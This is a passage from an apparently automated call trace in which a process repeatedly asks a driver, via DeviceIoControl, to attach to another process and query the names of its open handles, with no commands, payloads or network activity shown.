(Object=0xfffffa80019e9070) returned 0x1 [0161.321] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.321] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0161.322] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.322] PsAcquireProcessExitSynchronization () returned 0x0 [0161.322] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.322] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800385c5e0, HandleInformation=0x0) returned 0x0 [0161.322] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.322] PsReleaseProcessExitSynchronization () returned 0x2 [0161.322] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.322] ObQueryNameString (in: Object=0xfffffa800385c5e0, ObjectNameInfo=0xfffffa80030c9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c9044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.322] ObfDereferenceObject (Object=0xfffffa800385c5e0) returned 0x1 [0161.322] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.322] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.322] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.322] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0161.322] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.322] PsAcquireProcessExitSynchronization () returned 0x0 [0161.322] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.322] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fbfc80, HandleInformation=0x0) returned 0x0 [0161.323] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.323] PsReleaseProcessExitSynchronization () returned 0x2 [0161.323] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.323] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003034044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003034044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.323] ObfDereferenceObject (Object=0xfffffa8001fbfc80) returned 0x1 [0161.323] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.323] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.323] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.323] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0161.323] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.323] PsAcquireProcessExitSynchronization () returned 0x0 [0161.323] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.323] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002072760, HandleInformation=0x0) returned 0x0 [0161.323] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.323] PsReleaseProcessExitSynchronization () returned 0x2 [0161.323] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.323] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.323] ObfDereferenceObject (Object=0xfffffa8002072760) returned 0x1 [0161.323] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.323] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.324] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0161.324] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.324] PsAcquireProcessExitSynchronization () returned 0x0 [0161.324] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.324] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002009740, HandleInformation=0x0) returned 0x0 [0161.324] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.324] PsReleaseProcessExitSynchronization () returned 0x2 [0161.324] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.324] ObQueryNameString (in: Object=0xfffffa8002009740, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.324] ObfDereferenceObject (Object=0xfffffa8002009740) returned 0x1 [0161.324] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.324] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.324] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.324] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xb4, lpOverlapped=0x0) returned 1 [0161.324] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.324] PsAcquireProcessExitSynchronization () returned 0x0 [0161.324] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.324] ObReferenceObjectByHandle (in: Handle=0x324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b10320, HandleInformation=0x0) returned 0x0 [0161.325] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.325] PsReleaseProcessExitSynchronization () returned 0x2 [0161.325] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.325] ObQueryNameString (in: Object=0xfffff8a001b10320, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.325] ObfDereferenceObject (Object=0xfffff8a001b10320) returned 0x2 [0161.325] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.325] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.325] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.325] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0161.325] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.325] PsAcquireProcessExitSynchronization () returned 0x0 [0161.325] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.325] ObReferenceObjectByHandle (in: Handle=0x330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001bde960, HandleInformation=0x0) returned 0x0 [0161.325] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.325] PsReleaseProcessExitSynchronization () returned 0x2 [0161.325] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.325] ObQueryNameString (in: Object=0xfffff8a001bde960, ObjectNameInfo=0xfffffa8003205044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003205044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.325] ObfDereferenceObject (Object=0xfffff8a001bde960) returned 0x2 [0161.325] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.325] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.325] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xae, lpOverlapped=0x0) returned 1 [0161.326] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.326] PsAcquireProcessExitSynchronization () returned 0x0 [0161.326] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.326] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80021681e0, HandleInformation=0x0) returned 0x0 [0161.326] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.326] PsReleaseProcessExitSynchronization () returned 0x2 [0161.326] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.326] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.326] ObfDereferenceObject (Object=0xfffffa80021681e0) returned 0x1 [0161.326] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.326] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.326] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.326] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xb4, lpOverlapped=0x0) returned 1 [0161.326] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.326] PsAcquireProcessExitSynchronization () returned 0x0 [0161.326] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.326] ObReferenceObjectByHandle (in: Handle=0x33c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b66540, HandleInformation=0x0) returned 0x0 [0161.326] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.326] PsReleaseProcessExitSynchronization () returned 0x2 [0161.327] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.327] ObQueryNameString (in: Object=0xfffff8a001b66540, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.327] ObfDereferenceObject (Object=0xfffff8a001b66540) returned 0x2 [0161.327] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.327] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.327] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.327] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0161.327] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.327] PsAcquireProcessExitSynchronization () returned 0x0 [0161.327] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.327] ObReferenceObjectByHandle (in: Handle=0x34c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fb3580, HandleInformation=0x0) returned 0x0 [0161.327] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.327] PsReleaseProcessExitSynchronization () returned 0x2 [0161.327] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.327] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030c0044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.327] ObfDereferenceObject (Object=0xfffffa8001fb3580) returned 0x5 [0161.327] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.327] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.327] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.328] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0161.328] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.328] PsAcquireProcessExitSynchronization () returned 0x0 [0161.328] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.328] ObReferenceObjectByHandle (in: Handle=0x35c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001c4e8c0, HandleInformation=0x0) returned 0x0 [0161.328] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.328] PsReleaseProcessExitSynchronization () returned 0x2 [0161.328] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.328] ObQueryNameString (in: Object=0xfffff8a001c4e8c0, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.328] ObfDereferenceObject (Object=0xfffff8a001c4e8c0) returned 0x2 [0161.328] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.328] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.328] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.328] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0161.328] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.328] PsAcquireProcessExitSynchronization () returned 0x0 [0161.328] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.328] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00176cc30, HandleInformation=0x0) returned 0x0 [0161.328] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.328] PsReleaseProcessExitSynchronization () returned 0x2 [0161.328] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.328] ObQueryNameString (in: Object=0xfffff8a00176cc30, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.329] ObfDereferenceObject (Object=0xfffff8a00176cc30) returned 0x2 [0161.329] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.329] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.329] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.329] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0161.329] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.329] PsAcquireProcessExitSynchronization () returned 0x0 [0161.329] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.329] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001759700, HandleInformation=0x0) returned 0x0 [0161.329] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.329] PsReleaseProcessExitSynchronization () returned 0x2 [0161.329] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.329] ObQueryNameString (in: Object=0xfffff8a001759700, ObjectNameInfo=0xfffffa8002f9c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9c044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.329] ObfDereferenceObject (Object=0xfffff8a001759700) returned 0x2 [0161.329] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.329] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.329] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.329] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0161.329] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.330] PsAcquireProcessExitSynchronization () returned 0x0 [0161.330] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.330] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028573a0, HandleInformation=0x0) returned 0x0 [0161.330] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.330] PsReleaseProcessExitSynchronization () returned 0x2 [0161.330] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.330] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a8044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.330] ObfDereferenceObject (Object=0xfffffa80028573a0) returned 0x5 [0161.330] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.330] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.330] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0161.330] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.330] PsAcquireProcessExitSynchronization () returned 0x0 [0161.330] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.330] ObReferenceObjectByHandle (in: Handle=0x380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001b855f0, HandleInformation=0x0) returned 0x0 [0161.330] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.330] PsReleaseProcessExitSynchronization () returned 0x2 [0161.330] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.330] ObQueryNameString (in: Object=0xfffff8a001b855f0, ObjectNameInfo=0xfffffa80030cb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030cb044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.330] ObfDereferenceObject (Object=0xfffff8a001b855f0) returned 0x2 [0161.331] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.331] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.331] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0161.331] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.331] PsAcquireProcessExitSynchronization () returned 0x0 [0161.331] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880051635d0) [0161.331] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001bdbf30, HandleInformation=0x0) returned 0x0 [0161.331] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.331] PsReleaseProcessExitSynchronization () returned 0x2 [0161.331] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0161.331] ObQueryNameString (in: Object=0xfffff8a001bdbf30, ObjectNameInfo=0xfffffa80021af044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80021af044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.331] ObfDereferenceObject (Object=0xfffff8a001bdbf30) returned 0x2 [0161.331] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.331] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.331] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0161.332] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.332] PsAcquireProcessExitSynchronization () returned 0x0 [0161.332] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, 